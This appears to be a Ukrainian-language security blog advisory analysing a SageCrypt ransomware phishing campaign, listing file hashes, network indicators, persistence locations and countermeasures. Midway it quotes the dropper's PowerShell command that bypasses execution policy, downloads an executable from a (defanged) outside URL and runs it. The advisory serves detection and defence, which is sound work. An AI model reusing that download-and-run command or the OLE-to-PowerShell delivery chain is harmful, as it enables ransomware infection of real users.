IOC_SageCrypt_040917

Доброго вечора, панове.

Сьогодні також було зафіксовано спробу доставки уже відомого вам SageCrypt ransomware.

Рівень загрози – високий. (нічого складного нема, просто якщо не брати powershell – проходить крізь більшість стокових фільтрів + вельми низький рейт по Virus Total)

Для організацій, що прислухалися до рекомендацій у попередніх повідомленнях – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що основне тіло детектуєтся по GTI

Трохи аналітики:

Будь ласка, зверніть увагу на наступні особливості атаки

  • Документ не містить макрос, натомість там bat файл з інструкціями для PowerShell
  • Механізм дуже примітивний, але становить загрозу для тих, хто досі користується лише сигнатурним аналізом
  • Нічого нового, механізм OLE почали використовувати ще кілька років тому, просто раніше це було у вигляді “акт_сверки.exe”

Схема атаки:

email > attach DOCX > OLE > bat > powershell > URL > GET > %temp%\tempmsinstaller.exe

Маркери IOC:

документ із bat файлом

File Name просмотр_квитанции.docx
SHA-256 Hash Identifier 9E33F10650E32A33917F23E2D6F2DBC8076A822B340EB1D7B81CBE27E2A13C6A
File Size 16805 bytes
File Type application/vnd.openxmlformats-officedocument.wordprocessingml.document

При при активації OLE об’єкту запускається bat файл

File Name ✉_квитанция_для_печати.bat
SHA-256 Hash Identifier 255E91D8B9E1D162C83990E3B1914CB8C7116B5CD1568424685469D0065F949E
File Size 240 bytes
File Type ASCII text

який подає наступну команду на PowerShell:

powershell  Set-ExecutionPolicy Bypass -Scope Process;$path=($env:temp+'"msinstaller.exe'");$WebClient = New-Object System.Net.WebClient; 
$WebClient.DownloadFile('"h11p://thewomenslibrary.org.au/cgi_bin/ruki.exe'",$path); Start-Process $path

Процес C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ініціює з’єднання

69.89.31.250 HTTP 372 GET /cgi_bin/ruki.exe HTTP/1.1

Відбувається завантаження основної частини

File Name ruki.exe
SHA-256 Hash Identifier 72A900F45B6E36009BBA70CEA15C14B7D9A9C48184FCFB0FBEBE9AA49F58A464
File Size 1320960 bytes

Після запуску зразок основного тіла ініціює з’єднання із такими серверами:

141.20.33.68:9001
154.35.32.5:443
193.23.244.244:443
208.83.223.34:80
5.196.20.85:9001
85.195.207.92:9001
128.31.0.39:9101
216.218.222.10:443
46.249.37.143:9001
86.59.21.38:443

Дублює себе за шляхом:

C:\ProgramData\Windows\csrss.exe

Та додає у автозавантаження:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Client Server Runtime Subsystem “C:\ProgramData\Windows\csrss.exe REG_SZ

Що можна було зробити аби уникнути інфікування ?

  1. Активацію OLE можна було заблокувати змінивши параметри MS Office
  2. Завантаження основного тіла шкідливого коду можна було уникнути заборонивши мережеві з’єднання для процесу PowerShell (одне правило вбудованого брандмауера)
  3. Або ж завантаження запускних файлів можна було заблокувати на рівні proxy (через Web Gateway)
  4. Запис на диск та запуск основного тіла можна було заборонити блокуванням створення .exe файлів у каталозі профілю (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 4 кроки, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

69.89.31.250 HTTP GET /cgi_bin/ruki.exe HTTP/1.1
141.20.33.68:9001
154.35.32.5:443
193.23.244.244:443
208.83.223.34:80
5.196.20.85:9001
85.195.207.92:9001
128.31.0.39:9101
216.218.222.10:443
46.249.37.143:9001
86.59.21.38:443

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блок запуску OLE об’єктів через параметри пакету MS Office (HKCU\Software\Microsoft\Office\<Office Version>\<Office application>\Security\PackagerPrompt)
  • Блокування доступу PowerShell.exe до мережі Інтернет
  • Заборона створення та зчитування/запуску *.exe з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Жорстка фільтрація каналів доставки із перевіркою репутації як посилань так і самих файлів (MWG, MEG + GTI)
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: